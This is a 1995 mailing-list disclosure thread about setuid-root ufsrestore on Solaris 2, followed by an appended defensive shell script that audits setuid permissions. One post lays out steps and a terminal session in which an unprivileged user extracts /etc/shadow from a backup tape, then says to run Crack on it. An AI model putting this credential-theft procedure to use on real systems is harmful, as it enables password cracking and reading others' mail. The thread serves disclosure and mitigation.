Sean Vickery wrote:
>
> On 14 November 1995, Brett Lymn wrote:
> > According to Jake Luck:
> > >
> > >yeah, but what about /usr/sbin/ufsrestore ?
> > >
> > >it is statically linked, utilizes syslog, and suid root.
> > >
> >
> > If you are a BOFH then just kill the setuid bit on ufsrestore.  It
> > means that root has to do the restores but it does close an awful lot
> > of holes (like someone dragging in a QIC and restoring their favourite
> > version of /etc/passwd.... need I say more?).  Or you could just
> > remove the global rx though this may bugger up remote root users.
>
> Yes, /usr/sbin/ufsrestore is suid root on my Solaris 2 box.  But it is more
> careful than to allow an unprivileged user create or overwrite files just
> anywhere.
>

BUT, it will let you read ANY file from the tape. Including root owned
files such as /etc/shadow.

* Know when UNIX admins run backups.
* Extract files with ufsrestore (/etc/shadow)
* Run Crack.
* Or you could be reading root's mail, CEO email ... etc, etc

$ pwd
/home/esilva/ED_SILVA
$ date
Mon Dec 11 19:33:13 PST 1995
$ /usr/ucb/whoami
esilva
$ mt -f /dev/rmt/0 status
Exabyte EXB-8500 8mm tape drive:
   sense key(0x0)= No Additional Sense   residual= 0   retries= 0
   file no= 0   block no= 0
$ mt -f /dev/rmt/0 rewind
$ pwd
/home/esilva/ED_SILVA
$ ufsrestore -i /dev/rmt/0cn
ufsrestore >
ufsrestore > ls
.:
.rhosts      .sh_history  devices/     etc/
ufsrestore > cd etc
ufsrestore > add shadow
ufsrestore > extract
You have not read any volumes yet.
Unless you know which volume your file(s) are on you should start
with the last volume and work towards the first.
Specify next volume #: 1
set owner/mode for '.'? [yn] y
ufsrestore > quit
$ pwd
/home/esilva/ED_SILVA
$ cd etc
$ ls -la
total 8
drwxrwxr-x   2 esilva   other        512 Dec 11 19:54 .
drwxr-xr-x   3 esilva   other        512 Oct 11 21:48 ..
-r--------   1 esilva   other       1144 Oct  9 09:21 shadow.1.la

Now run crack...

--
Thanks!
-Ed

+---------------------------------------------------------------------+
|                   Can you see them all around us?                   |
+---------------------------------------------------------------------+
|                          esilva@netcom.com                          |
+---------------------------------------------------------------------+
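
The two mitigations Brett Lymn names in the quoted text (dropping the setuid bit, or removing the world r-x bits) can both be verified from an `ls -l` listing. The script below is an added example, not part of the original post; the sample listing lines, group names and sizes are constructed.

```shell
#!/bin/sh
# Added example: classify `ls -l` lines for a restore binary such as
# /usr/sbin/ufsrestore. It reports whether a root-owned setuid file can be
# executed by every local user, by one group only, or not at all.

audit_line() {
    # Split the listing line into fields: mode links owner group ... name
    set -f; set -- $1; set +f
    [ $# -ge 4 ] || { echo "SKIP (unparsed line)"; return 0; }
    mode=$1 owner=$3 group=$4
    for name in "$@"; do :; done          # last field is the path

    case $mode in
        -??[sS]*) ;;                      # regular file, setuid bit present
        *) echo "OK $name (not setuid)"; return 0 ;;
    esac
    if [ "$owner" != root ]; then
        echo "OK $name (setuid to $owner, not root)"; return 0
    fi
    case $mode in
        -????????[xt]*) echo "EXPOSED $name (any user runs it as root)" ;;
        -?????[xs]*)    echo "GROUP-ONLY $name (limited to group $group)" ;;
        *)              echo "OK $name (setuid, but only root can execute)" ;;
    esac
}

# Constructed sample listing: the state described in the thread, then the
# "remove the global rx" fix, then the "kill the setuid bit" fix.
audit_samples() {
    while IFS= read -r line; do
        audit_line "$line"
    done <<'EOF'
-r-sr-xr-x   1 root     bin       500000 Oct  9  1995 /usr/sbin/ufsrestore
-r-sr-x---   1 root     operator  500000 Oct  9  1995 /usr/sbin/ufsrestore
-r-xr-xr-x   1 root     bin       500000 Oct  9  1995 /usr/sbin/ufsrestore
EOF
}

audit_samples
```

On a live system, feed it real listing lines, for example `audit_line "$(ls -l /usr/sbin/ufsrestore)"`.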